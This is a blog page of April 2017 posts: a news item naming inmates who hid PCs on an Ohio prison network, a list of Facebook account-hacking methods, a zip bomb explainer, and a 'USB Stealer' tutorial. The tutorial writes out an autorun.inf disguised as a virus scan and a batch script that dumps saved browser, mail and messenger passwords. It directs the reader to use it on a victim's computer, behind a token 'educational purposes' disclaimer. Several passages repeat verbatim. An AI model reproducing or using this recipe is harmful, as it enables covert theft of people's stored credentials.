Ohio prisoners who built personal computers from parts
April 14, 2017
Can you imagine your world without the Internet?
I know it's hard to imagine your life without the Internet, and the same was the case of two Ohio prisoners who built personal computers from parts from e-waste, hid them in the ceiling, and connected those PCs to the Internet via the prison's network.
The incident occurred in 2015 but has now been made public by the State of Ohio's Office of the Inspector General, which published a 50-page report [PDF] on Tuesday, following almost a year-long investigation.
According to the report, a prison work program has backfired two inmates of Marion Correctional Institution in Ohio, Florida, who smuggled computer parts from an e-waste recycling workshop and built two clandestine computers out of them.
The unsupervised inmates later hid the computers behind a plywood board in the ceiling of a training room, and then connected those working PCs to the Ohio Department of Rehabilitation and Correction (ODRC) network to access the Internet.
But once the inmates got online, unsurprisingly, they used their skills to break the law.
The prisoners accessed the internal records of other inmates, created inmate passes for restricted areas, accessed websites with information about manufacturing drugs, weapons, and explosives, and apply for credit cards under another prisoner's name for a planned tax fraud scheme, Ohio's government watchdog said.
Besides this, the forensics team also found "self-signed certificates, Pidgin chat accounts, Tor sites, Tor geo exit nodes, ether soft, pornography, videos, VideoLan, virtual phone, and other various software."
The scheme was discovered after prison technology employee Gene Brady alerted about unusual levels of internet activity on a contractor's account on days when the employee was not scheduled to work.
Ultimately, a total of five inmates were identified as being involved with the hidden computers during the investigation:
Stanislov Transkiy – Executive committee chairman of Recycling.Leeshan McCullough – Chairman of aquaculture.Robert Cooper – Chairman of horticulture.Matthew Brown – Chairman of environmental education.Adam Johnston – Executive committee treasurer.All the five inmates have now been separated and moved to other correctional facilities.
Stanislov Transkiy – Executive committee chairman of Recycling.Leeshan McCullough – Chairman of aquaculture.Robert Cooper – Chairman of horticulture.Matthew Brown – Chairman of environmental education.Adam Johnston – Executive committee treasurer.All the five inmates have now been separated and moved to other correctional facilities.
"We will thoroughly review the reports and take any additional steps necessary to prevent these types of things from happening again," the ODRC said in a statement.
"It's of critical importance that we provide necessary safeguards in regards to the use of technology while still providing opportunities for offenders to participate in meaningful and rehabilitative programming."
The Marion Correctional Institution (MCI), which houses nearly 2,500 inmates, operates many programs to educate or provide services to the community, including the MCI Green Initiative to revamp the institution's trash and recycling processes.
10 Way Used by Hackers to hack Facebook account
April 12, 2017
10 Way Used by Hackers to hack Facebook account
Note :- This post is only for security purpose don't try any illigal activity and i'm just shared these methods because protect our facebook account from these types of hacking attacks.
Mostly Hackers use these methods to hack facebook account, So protect yourself from hackers. Must Read this post, and beware from
hackers.
1. Hack Facebook Account Password By Phishing:-
Phishing is still the most popular attack vector used for
hacking Facebook accounts. There are variety methods to carry out phishing
attack. In a simple phishing attacks a hacker creates a fake log in page which
exactly looks like the real Facebook page and then asks the victim to log in.
Once the victim log in through the fake page the, the victims "Email
Address" and "Password" is stored in to a text file, and the
hacker then downloads the text file and gets his hands on the victims
credentials.
2. Hack Facebook Account Password By Keylogging :-
Keylogging is the easiest way to hack a Facebook password.
Keylogging sometimes can be so dangerous that even a person with good knowledge
of computers can fall for it. A Keylogger is basically a small program which,
once is installed on victim's computer, will record every thing victim types on
his/her computer. The logs are then send back to the attacker by either FTP or
directly to hackers email address.
3. Stealer's:-
Almost 80% percent people use stored passwords in their
browser to access the Facebook. This is quite convenient, but can sometimes be
extremely dangerous. Stealer's are software's specially designed to capture the
saved passwords stored in the victims Internet browser.
4. Hack Facebook Account Password By Session Hijacking :-
Session Hijacking can be often very dangerous if you are
accessing Facebook on a http (non secure) connection. In Session Hijacking
attack, a hacker steals the victims browser cookie which is used to
authenticate the user on a website, and use it to access the victims account.
Session hijacking is widely used on LAN, and WiFi connections.
5. Sidejacking With Firesheep :-
Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.
6. Mobile Phone Hacking :-
Millions of Facebook users access Facebook through their
mobile phones. In case the hacker can gain access to the victims mobile phone
then he can probably gain access to his/her Facebook account. Their are a lots
of Mobile Spying software's used to monitor a Cellphone. The most popular
Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.
7. DNS Spoofing :-
If both the victim and attacker are on the same network, an
attacker can use a DNS spoofing attack and change the original Facebook page to
his own fake page and hence can get access to victims Facebook account.
8 USB Hacking :-
If an attacker has physical access to your computer, he
could just insert a USB programmed with a function to automatically extract
saved passwords in the Internet browser.
9. Man In the Middle Attacks :-
If the victim and attacker are on the same LAN and on a
switch based network, a hacker can place himself between the client and the
server, or he could act as a default gateway and hence capturing all the
traffic in between.
10. Botnets :-
Botnets are not commonly used for hacking Facebook accounts,
because of it's high setup costs. They are used to carry more advanced attacks.
A Botnet is basically a collection of compromised computer. The infection
process is same as the key logging, however a Botnet gives you additional
options for carrying out attacks with the compromised computer. Some of the
most popular Botnets include Spyeye and Zeus.
Note:-Mostly hackers use these methods to hack facebook account
password, We are shared this ways/post only for security purpose.
Introduced to zip Bomb
April 10, 2017
This post is about zip bomb and it's working. You will also get a gist of how petabytes of files are converted into smaller files of kilo or mega bytes. Now I will take you through some things that will really intrigue you. Let's get started straight away.
What's zip bomb?
A zip bomb also known as zip of death or decompression bomb, is a malicious archive file designed to crash or render useless the program or system reading it. It is open employed to disable antivirus software in order to crate opening for traditional types of viruses.
Rather than highjacking the normal operation of a program, the zip bomb allows a program to work as intended, the archive is carefully crafted so that unpacking it i.e if an antivirus scans the zip file for viruses, will require inordinate amount of time, disk space or memory.
But as everything it has certain limitations ofcourse. This zip file is a very tiny zip file most of them are measured in Kilobytes.
Now, you may have lots of questions like
Rather than highjacking the normal operation of a program, the zip bomb allows a program to work as intended, the archive is carefully crafted so that unpacking it i.e if an antivirus scans the zip file for viruses, will require inordinate amount of time, disk space or memory.
But as everything it has certain limitations ofcourse. This zip file is a very tiny zip file most of them are measured in Kilobytes.
Now, you may have lots of questions like
1) Why is it so tiny?
2) Why call it a zip BOMB when it's so tiny?
3) How is it so small?
4) How does it work?
So here are your answers:
1) Why is it so tiny?
Zip bomb is a tiny zip file. Now it is made so tiny to avoid suspicion. It's obvious aint it? You dont want tell the police you are a thief, you make it look different. It is made tiny because of compression of huge amount of data and the reason it being tiny makes using it a "pure hacker like mentality"
2) Why call it a zip BOMB when it's so tiny?
Never judge a book by it's cover. Never underestimate smaller one's. It is called zip bomb or zip of death becasue it contains upto terabytes, petabytes or even exabytes of data.That's the key to clear out malware and hence blocking every obstacle in it's path leaving a straight Asphalt. Now you will certainly want to know, how is it possible to complete such large a files into a zip file of such small size. Don't worry you will get your answers further. A simple example of a zip bomb is the file 42.zip, which is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3-gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out-of-memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level, effectively converting their exponential growth to linear. There are also zip files that, when uncompressed, yield identical copies of themselves.
3) How is it so small?
Nowadays various compression tools make us of term called "looseless compression algorithm". As the name suggests this algorithm strives to compress files without any loss of information, which is very important of course. We dont want to lose any information while we compress files. To show how this zip file works, let me tal about it's simple principle. Computer only understands binary language i.e 0's and 1's. So every file in order to be understood by a computer must in binary i.e 0,1 format. If we take a binary number "0 1 0 0 0 1 1 1" and let's say we have a tool to compress it to a number like "0 1 3 0 3 1"? The same logic apllies here. In the initail binary number there were 3 o's and 3 1's starting from 3rd digit. we just replaced it with 30 and 31. Now this might not be the exact logic that governs the compression but correct upto a certain extent. Thus the zip bomb which will contain only 0's and 1's will work in this way making copies of some files again and again and compressing them into a single zip file resulting it to throw up data of about terabytes, petabyte or exabytes.
Make a text file with only o's and 1's. Make a copy of it.
Type upto 1000 zeros and just do "Ctrl+a", "Ctrl+c","Ctrl+v".
Do it until the text file begins to lag.
The size should be more than 1 Gigabyte.
Then compress it and see the magic. The compressed file will be arond 1 Megabyte.
Type upto 1000 zeros and just do "Ctrl+a", "Ctrl+c","Ctrl+v".
Do it until the text file begins to lag.
The size should be more than 1 Gigabyte.
Then compress it and see the magic. The compressed file will be arond 1 Megabyte.
4) How does it work?
Zip bomb contains about petabytes of data, this if an antivirus tries to scan it, it will start to decompress it first. But just imagine what will happen if a file of about a kilobyte is decompressed and we get a file of about a few or more petabytes. The answers simple, before the zip file is completely scanned the antivirus will crash, creating a loophole for attackers.
USB Stealer
April 10, 2017
Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations. We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords. As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make aUSB passwordstealer and steal saved passwords.
Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.
To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.
THINGS YOU WILL NEED
MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.
Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc.
IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) - Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express, and MSN Explorer.
Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
ChromePass - ChromePass is a small password recovery tool that allows you to view the usernames and passwords stored by Google Chrome Web browser.
STEPS :
1. First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into yourUSB Drive.
2. Create a new Notepad and input the following text:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the "autorun.inf" file onto yourUSB Stick.
Now copy the "autorun.inf" file onto yourUSB Stick.
3. Create another Notepad and write the following text onto
it:
it:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
4. Save the Notepad and rename it from "New Text Document.txt" to "launch.bat"
5. Copy the "launch.bat" file onto your USBdrive. Now your USB Password stealer is ready, all you have to do is insert it in your victim's computer and a popup will appear. In the popup window, select the option "launch virus scan."
After this you can see saved password in .TXT files
Purely for educational purposes. Use these tools at your own risk!
Subscribe to:
Posts (Atom)
